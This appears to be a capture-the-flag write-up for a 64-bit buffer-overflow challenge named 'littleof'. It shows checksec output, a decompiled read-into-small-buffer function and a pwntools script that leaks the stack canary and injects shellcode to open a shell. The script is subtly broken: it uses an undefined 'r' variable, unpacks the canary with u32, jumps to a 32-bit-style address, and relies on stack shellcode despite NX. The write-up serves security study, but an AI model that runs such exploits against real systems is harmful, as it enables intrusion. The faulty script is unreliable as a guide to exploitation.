跳转至

littleof

1

hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ file littleof 
littleof: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=5fb3463441161f83eaecda9a6abaaab89debe09f, stripped
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ checksec littleof 
[*] '/home/hamilton/Downloads/\xe9\x99\x84\xe4\xbb\xb6/littleof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ 
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ ls
libc-2.27.so  littleof  main
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ file main 
main: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=SbdNpcmHFLk2wxxGroDK/eAYbXRTx1FtkTOZ6bYjs/UeXTgMk-58143Im6_i3Z/HEZAZRj6H7CjTH5bTU-m, stripped
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ chmod +x littleof
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ 
hamilton@hamilton-Lenovo-G470:~/Downloads/附件$ ./littleof 
Do you know how to do buffer overflow?
AAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA
�U(. Try harder!AAAAAAAAAAAAAAAA
I hope you win
unsigned __int64 sub_4006E2()
{
  char buf[8]; // [rsp+10h] [rbp-50h] BYREF
  FILE *v2; // [rsp+18h] [rbp-48h]
  unsigned __int64 v3; // [rsp+58h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  v2 = stdin;
  puts("Do you know how to do buffer overflow?");
  read(0, buf, 0x100uLL);
  printf("%s. Try harder!", buf);
  read(0, buf, 0x100uLL);
  puts("I hope you win");
  return __readfsqword(0x28u) ^ v3;
}

2

##!/usr/bin/env python
from pwn import *

context(arch='amd64', os='linux', endian='little', word_size=64)
shellcode = asm(shellcraft.sh())
shell_addr = 0x804a080

sh = process('./littleof')
sh.recvuntil("Do you know how to do buffer overflow?")
payload = b"A"*(0x50 - 8)
sh.sendline(payload)
r.recvuntil(payload)
canary = u32(sh.recv(8))-0xa
print("canary = 0x", hex(canary))

sh.recvuntil("Try harder!")
sh.sendline(b"A"*8 + p64(canary) + p64(shell_addr) + shellcode)
sh.interactive()